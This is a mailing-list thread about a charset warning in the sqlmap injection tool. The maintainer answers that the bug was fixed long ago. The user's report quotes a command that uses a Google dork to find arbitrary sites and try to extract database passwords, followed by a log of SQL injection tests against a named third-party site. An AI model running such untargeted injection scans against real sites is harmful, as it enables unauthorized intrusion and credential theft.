Re: [sqlmap-users] Reporting: Unknown web page charset

Mon, 25 May 2015 07:03:25 -0700 

Hi Daniel.

Thank you for your report. This should be "patched" long time ago. Please
update to the latest revision from our GitHub repository to have it up to
date (https://github.com/sqlmapproject/sqlmap/).

Kind regards,
Miroslav Stampar

On Sat, May 23, 2015 at 9:34 PM, Daniel Devereux <
danieldevereux1...@gmail.com> wrote:

> *Reporting*
> [20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sqlmap-users@lists.sourceforge.net.
>
> *Command*
> sqlmap -g inurl:"showpro.asp?id=" --random-agent --batch --passwords
>
> *Terminal Readout*
> GET http://www.sh-sinap.com/en/Showpro.asp?id=6
> do you want to test this URL? [Y/n/q]
> > Y
> [20:21:30] [INFO] testing URL 'http://www.sh-sinap.com/en/Showpro.asp?id=6
> '
> [20:21:40] [INFO] testing connection to the target URL
> [20:21:46] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [20:21:50] [INFO] target URL is stable
> [20:21:50] [INFO] testing if GET parameter 'id' is dynamic
> [20:21:51] [WARNING] GET parameter 'id' does not appear dynamic
> [20:21:52] [WARNING] heuristic (basic) test shows that GET parameter 'id'
> might not be injectable
> [20:21:52] [INFO] testing for SQL injection on GET parameter 'id'
> [20:21:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> *[20:21:53] [WARNING] unknown web page charset 'gbk2312'. Please report by
> e-mail to sqlmap-users@lists.sourceforge.net
> <sqlmap-users@lists.sourceforge.net>.*
> [20:21:53] [INFO] heuristics detected web page charset 'GB2312'
> [20:22:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING
> clause'
> [20:22:20] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING
> clause'
> [20:22:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
> WHERE or HAVING clause'
> [20:22:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause
> (XMLType)'
> [20:22:46] [INFO] testing 'MySQL inline queries'
> [20:22:47] [INFO] testing 'PostgreSQL inline queries'
> [20:22:51] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
> [20:22:53] [INFO] testing 'Oracle inline queries'
> [20:22:55] [INFO] testing 'SQLite inline queries'
> [20:22:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
> [20:22:56] [CRITICAL] there is considerable lagging in connection
> response(s). Please use as high value for option '--time-sec' as possible
> (e.g. 10 or more)
> [20:23:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
> [20:23:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
> [20:23:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [20:23:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
> sqlmap got a 302 redirect to 'http://www.sh-sinap.com:80/en/Showpro.asp'.
> Do you want to follow? [Y/n] Y
> [20:23:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
> [20:23:47] [INFO] testing 'Oracle AND time-based blind'
> [20:24:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [20:25:38] [WARNING] using unescaped version of the test because of zero
> knowledge of the back-end DBMS. You can try to explicitly set it using
> option '--dbms'
> [20:27:14] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:27:45] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:16] [CRITICAL] connection timed out to the target URL or proxy.
> sqlmap is going to retry the request
> [20:28:47] [CRITICAL] connection timed out to the target URL or proxy
> [20:29:10] [WARNING] user aborted during detection phase
> how do you want to proceed? [(S)kip current test/(e)nd detection
> phase/(n)ext parameter/(c)hange verbosity/(q)uit] n
> [20:29:22] [WARNING] GET parameter 'id' is not injectable
> [20:29:22] [ERROR] all tested parameters appear to be not injectable. Try
> to increase '--level'/'--risk' values to perform more tests. Also, you can
> try to rerun by providing either a valid value for option '--string' (or
> '--regexp'), skipping to the next URL
> [20:29:22] [WARNING] HTTP error codes detected during run:
> 500 (Internal Server Error) - 15 times
>
> Regards
> Dan
>
>
> ------------------------------------------------------------------------------
> One dashboard for servers and applications across Physical-Virtual-Cloud
> Widest out-of-the-box monitoring support with 50+ applications
> Performance metrics, stats and reports that give you Actionable Insights
> Deep dive visibility with transaction tracing using APM Insight.
> http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

------------------------------------------------------------------------------
One dashboard for servers and applications across Physical-Virtual-Cloud 
Widest out-of-the-box monitoring support with 50+ applications
Performance metrics, stats and reports that give you Actionable Insights
Deep dive visibility with transaction tracing using APM Insight.
http://ad.doubleclick.net/ddm/clk/290420510;117567292;y
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to